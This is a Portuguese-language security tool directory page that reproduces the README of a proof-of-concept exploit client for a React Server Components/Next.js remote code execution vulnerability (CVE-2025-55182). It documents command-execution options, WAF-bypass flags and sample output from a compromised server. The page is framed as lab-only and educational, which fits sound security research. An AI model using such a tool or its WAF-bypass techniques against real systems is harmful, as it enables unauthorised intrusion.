Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-scanner — Detecção Baseada em Precisão de Vulnerabilidades de Execução Remota de Código em RSC/Next.js (CVE-2025-55182, CVE-2025-66478) | Kitploit
Ferramentas/GitHubGitHub/hidden-investigations/react2shell-scanner
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoAprendizado e Educação
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

Detecção Baseada em Precisão de Vulnerabilidades de Execução Remota de Código em RSC/Next.js (CVE-2025-55182, CVE-2025-66478)

Ver RepositórioSite
53há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner React2Shell – com PoC

CVE-2025-55182 – PoC de RCE em React Server Components
Cliente de exploração educacional para o laboratório React2Shell da Hidden Investigations.

Este repositório contém uma ferramenta de exploração de prova de conceito (PoC) para um único host da vulnerabilidade React2Shell (CVE-2025-55182), direcionada a aplicações React Server Components / Next.js mal configuradas.

Ela foi projetada para ser usada apenas contra o laboratório React2Shell da Hidden Investigations oficial ou sistemas que você possua / administre explicitamente.


⚠️ Aviso Legal e Ético

Este projeto é fornecido estritamente para pesquisa educacional e de segurança defensiva:

  • Use esta ferramenta somente em:
    • O laboratório React2Shell da Hidden Investigations oficial, ou
    • Sistemas que você possua ou para os quais tenha permissão explícita por escrito para testar.
  • Não aponte isto para sites aleatórios, sistemas em produção ou infraestrutura que você não controla.
  • Os autores e a Hidden Investigations não se responsabilizam por uso indevido ou danos.

Ao usar esta ferramenta, você concorda em seguir todas as leis e regulamentos aplicáveis.


Recursos

  • 🔥 Cliente de exploração React2Shell para CVE-2025-55182
  • 🎯 Focado em um único host (sem varredura em massa)
  • 📡 Suporte para caminhos personalizados e listas de caminhos
  • 🧪 Modo de verificação segura (sem comandos de SO, apenas uma sonda de detecção)
  • 🪟 Modo compatível com Windows (whoami por padrão)
  • 🛡️ Auxiliares de bypass de WAF:
    • Campo multipart de lixo (--waf-bypass, --waf-bypass-size)
    • Ajuste de layout do Vercel (--vercel-waf-bypass)
  • 🔐 Opções de TLS (--insecure, cabeçalhos personalizados)
  • 🧾 Saída JSON (-o/--output, --all-results)
  • 🧘 Saída limpa no modo silencioso (perfeito para canalizar para outras ferramentas)

  • Requisitos

    • Python: 3.8+ (testado com Python 3.10+)
    • Dependências:
      • requests

    Instale as dependências com:

    root@kitploit:~
    pip install -r requirements.txt
    

    Instalação

    1. Clone o repositório da Hidden Investigations:
    root@kitploit:~
    git clone https://github.com/hidden-investigations/react2shell-poc.git
    cd react2shell-poc
    
    1. (Opcional, mas recomendado) Crie um virtualenv:
    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate   # On Windows: venv\Scripts\activate
    
    1. Instale os requisitos:
    root@kitploit:~
    pip install -r requirements.txt
    
    1. Execute a ferramenta:
    root@kitploit:~
    python3 react2shell-scanner.py -h
    

    Uso

    Ajuda básica:

    root@kitploit:~
    python3 react2shell-scanner.py -h
    

    A ferramenta requer uma URL de destino:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
    # or
    python3 react2shell-scanner.py --url http://localhost:3000 -c "id"
    

    Se você executá-la sem -t/--target ou -u/--url, ela exibe uma mensagem de ajuda com a marca e encerra.


    Opções de Linha de Comando

    Alvo e caminhos

    OpçãoDescriçãoPadrão
    -t, --targetURL ou domínio de destino (obrigatório, a menos que --url seja usado)Nenhum
    -u, --urlAlias para --target (flag estilo Assetnote)Nenhum
    --pathCaminho a testar (pode ser usado várias vezes, ex.: /, /_next)/
    --path-fileArquivo contendo caminhos a testar (um por linha)Nenhum

    Nota: Este PoC é apenas para um único host. A opção -l/--list está presente, mas intencionalmente desabilitada.


    Comportamento de exploração / payload

    OpçãoDescriçãoPadrão
    -c, --commandComando a executar no alvo (quando a exploração tem sucesso)id
    --safe-checkUsar um payload SAFE_CHECK (sem comando de SO, apenas uma string de marcação)off
    --windowsAjustar padrões para alvos Windows (ex.: usar whoami quando o comando é id)off
    --waf-bypassAntepor um grande campo multipart de lixo ao corpo da requisição para evasão de WAFoff
    --waf-bypass-size KBTamanho do campo de lixo em KB ao usar --waf-bypass128
    --vercel-waf-bypassUsar um layout multipart alternativo para ajustar o comportamento do WAF da Vercel (PoC simplificado)off

    Opções de HTTP / TLS

    OpçãoDescriçãoPadrão
    --timeout SECONDSTempo limite da requisição em segundos15 (ou 20 se --waf-bypass e nenhum timeout definido)
    -k, --insecureDesabilitar verificação SSL (como curl -k)off
    -H, --headerCabeçalho personalizado, ex.: -H "X-Forwarded-For: 127.0.0.1" (repetível)Nenhum

    Opções de saída / UX

    OpçãoDescriçãoPadrão
    -o, --output FILEEscrever os resultados JSON em FILENenhum
    --all-resultsAo usar --output, incluir também resultados não vulneráveisoff
    -v, --verboseModo verboso – mostrar o status HTTP e o cabeçalho X-Action-Redirectoff
    -q, --quietModo silencioso – imprime apenas a saída normalizada do comando em caso de sucessooff
    --no-colorDesabilitar saída colorida no terminaloff

    Exemplo de modo silencioso (saída agradável, multilinha):

    root@kitploit:~
    python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"
    

    Output:

    root@kitploit:~
    total 12
    drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
    drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
    drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
    drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
    -rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
    drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
    -rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js
    

    Flags de varredura em massa (intencionalmente desabilitadas)

    As seguintes flags existem para espelhar a CLI da Assetnote, mas não são implementadas neste PoC para evitar o uso indevido em varredura em massa:

    OpçãoStatus
    -l, --listNão implementado
    --threads NNão implementado

    Se você usar -l/--list, a ferramenta exibirá um aviso e encerrará, sugerindo que use o react2shell-scanner original da Assetnote para varredura segura em larga escala.


    Exemplos

    Execute contra o laboratório local:

    root@kitploit:~
    python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"
    

    Use o bypass de WAF com um campo de lixo maior:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"
    

    Múltiplos caminhos no mesmo host:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"
    

    Caminhos a partir de arquivo:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"
    

    Modo de verificação segura (nenhum comando de SO é executado):

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000 --safe-check
    

    Saída JSON dos resultados para um arquivo:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results
    

    Formato de Saída JSON

    Quando -o/--output é usado, a ferramenta grava um array de objetos como:

    root@kitploit:~
    [
      {
        "url": "http://localhost:3000/",
        "path": "/",
        "success": true,
        "status": "success",
        "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
        "http": {
          "status_code": 302,
          "headers": {
            "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
            "...": "..."
          }
        }
      }
    ]
    

    Créditos e Agradecimentos

    • Hidden Investigations – por publicar o laboratório educacional React2Shell e o cliente PoC.
    • @sakibulalikhan – autor da ferramenta.
    • Assetnote – inspiração para ideias de bypass de WAF por meio de seu react2shell-scanner.

    Licença

    Este projeto está licenciado sob a Licença MIT. Consulte LICENSE para obter detalhes.

    📬 Fale conosco: [email protected]

    Baixar ferramenta